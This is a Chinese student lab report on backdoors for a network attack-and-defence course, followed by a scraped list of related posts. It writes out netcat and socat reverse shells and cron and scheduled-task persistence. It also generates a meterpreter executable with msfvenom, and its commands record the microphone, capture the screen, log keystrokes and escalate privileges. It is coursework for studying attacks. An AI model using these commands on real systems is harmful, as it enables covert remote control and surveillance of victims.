2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

一、实验内容 (3.5分)

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:在一些网站下载应用程序时,该应用程序可能绑定了一些可执行文件,留下后门。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:Linux可以通过crontab功能将木马设为定时启动或通过对正常软件的绑定注入shellcode达到开启后门的目的。

(3)Meterpreter有哪些给你映像深刻的功能?

答:植入后门实施远程控制、metsvc后渗透攻击模块等等。

(4)如何发现自己有系统有没有被安装后门?

答:查看是否有IP与本机建立连接;安装专门的杀毒软件,定期检测电脑安全情况等等。

二、实验具体步骤

实验一

任务一 使用netcat获取主机操作Shell

1、在Windows下打开命令行,查看Windows的ip地址为:

2、使用ncat.exe程序打开监听ncat.exe -l -p 5236:

3、在kali中反弹连接Windows,nc 172.30.0.142 5236 -e /bin/sh:

4、Windows成功获得kali的shell,如图所示:

任务二  Linux获得Windows Shell

1、在Kali环境中使用ifconfig查看ip:

2、使用nc指令监听5236端口:

3、在Windows中反弹连接kali,输入ncat.exe -e cmd.exe 172.30.5.29 5236,

4、kali成功获得Windows的命令提示,输入Windows命令:

任务三  使用nc传输数据

1、Windows下监听5236端口:

2、Kali下连接到Windows的5236端口,nc 192.168.43.44 5236,

3、建立连接,传输数据,但这个过程中我遇到了点问题如下,但是查阅相关资料后目前还未解决:

实验二

任务一  使用netcat获取主机操作Shell,cron启动

1、在Windows系统下,监听5236端口:

2、用crontab -e指令编辑一条定时任务,选择编辑器选择3,在底行插入04 * * * * /bin/netcat 172.30.0.142 5236 -e /bin/sh,

意思是每个小时的第4分钟反向连接Windows的5236端口:

3、保存退出后输入crontab -l 即可查看:

4、在系统时间到第4分钟,就会在Windows中监听的cmd中发现获得Linux shell:

任务二 使用socat获取主机操作Shell, 任务计划启动

1、控制面板中打开系统与安全,选择任务计划程序并创建任务,

2、常规中填写任务名称学号:20165236,新建触发器 ,选择:工作站锁定时:

3、点击操作,在程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5236 exec:cmd.exe,pty,stderr:

4、创建完成之后,按Windows+L锁定计算机,再次打开,之前创建的任务已经开始运行:

5、在Kali-Linux中输入指令socat - tcp:172.30.0.142:5236:

任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、在kali中输入:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.0.142 LPORT=5236 -f exe > 20165236_backdoor.exe,

生成后门程序:

2、在Windows中输入:nc.exe -l 5236 > 20165236_backdoor.exe :

3、Linux中执行nc 172.30.0.142 5236 < backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP,

4、在Windows的ncat文件夹下查看后门程序,如图所示,文件传输成功:

5、在Kali中打开一个终端,使用msfconsole指令进入msf控制台:

6、接着输入use exploit/multi/handler使用监听模块,设置payload;

7、set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

8、set LHOST 172.30.0.142,这里用的是LinuxIP,和生成后门程序时指定的IP相同;

9、set LPORT 5236,同样要使用相同的端口:

这里出了点问题,目前尚未解决:

任务四  

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1、使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间:

2、 使用screenshot指令可以进行截屏:

3、使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

4、使用getuid指令查看当前用户,或getsystem指令进行提权等等:

三、实验过程中遇到的问题

1、如图所示:

询问同学后得知解决方法为:双击后再运行。

2、在Kali中使用msfconsole指令进入msf控制台后,出现如下界面:

原因是后台程序过多,内存不够;

解决方法:关闭虚拟机,将内存调高后重启虚拟机。

四、实验体会

本次实验为网络对抗第二次实验,相对于第一次实验内容较多,过程也较为复杂。其中也出现许多新的知识,以及许多我不太懂的地方。

在询问老师同学和查阅资料后这些问题也一一解决了,并且顺利完成了本次实验。虽然实验过程中存在许多困难,但我依然从中收获了许多新知识。

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. centos7中设置nginx的systemctl启动方式

    1.建立服务文件 (1)文件路径 vim /usr/lib/systemd/system/nginx.service (2)服务文件内容 [Unit] Description=nginx - high ...

  2. php无限极分类方法

    仅供参考: //控制器 $data = M('category')->select(); $datas = D('Category')->_getTree($data, 0,0,TRUE) ...

  3. EF 简单介绍<一>

    一:EF概述 Entity Framework(EF)是一个开源的“对象/关系映射(ORM:Object Relational Mapping)”框架,使应用程序可以使用一种“纯”的对象模型来访问关系 ...

  4. mq_receive

    NAME mq_receive - 从消息队列中获取消息 (REALTIME) SYNOPSIS #include <mqueue.h> ssize_t mq_receive(mqd_t ...

  5. 关于ajax请求数据,并将数据赋值给全局变量的一些解决方法

    在使用ajax请求数据是,开始的时候是打算将ajax的数据取出,并赋予给全局变量,但是在实际编码过程中发现并不能将数据赋予给最开始定义的全局变量,出现这个问题的原因是由于ajax异步加载的原因,所以只 ...

  6. Server酱微信推送中的问题

    1.写在URL的文字就是不在微信端显示 当时为了明显提示写了个这个:<--11111-->后来发现1111不能显示,去掉两边的<---->就可以了, 2.输出到微信端的文字不换 ...

  7. BZOJ.2616.SPOJ PERIODNI(笛卡尔树 树形DP)

    BZOJ SPOJ 直观的想法是构建笛卡尔树(每次取最小值位置划分到两边),在树上DP,这样两个儿子的子树是互不影响的. 令\(f[i][j]\)表示第\(i\)个节点,放了\(j\)个车的方案数. ...

  8. 潭州课堂25班:Ph201805201 tornado 项目 第七课 界面美化和静态文件处理(课堂笔记)

    tornado 相关说明 使用  Bootstrap 前端框架 可以在 bootCDN 这里找 jquery ,poppe.js 文件 美化项目 twittel 的开源项目, 在 static 目录下 ...

  9. vue学习:安装及创建项目

    1.先安装npm 参考链接:https://www.cnblogs.com/Hao-Killer/p/7235398.html 查看npm版本:在终端输入:npm -v 2.在安装vue # 安装vu ...

  10. 配置ssh框架启动tomcat服务器报异常Unable to create requested service [org.hibernate.engine.jdbc.env.spi.JdbcEnvironment]

    在Spring中配置jdbc时,引用的是dbcp.jar包,在db.properties配置文件中,使用了之前的properties配置文件的用户名username(MySql用户名) 然后在启动服务 ...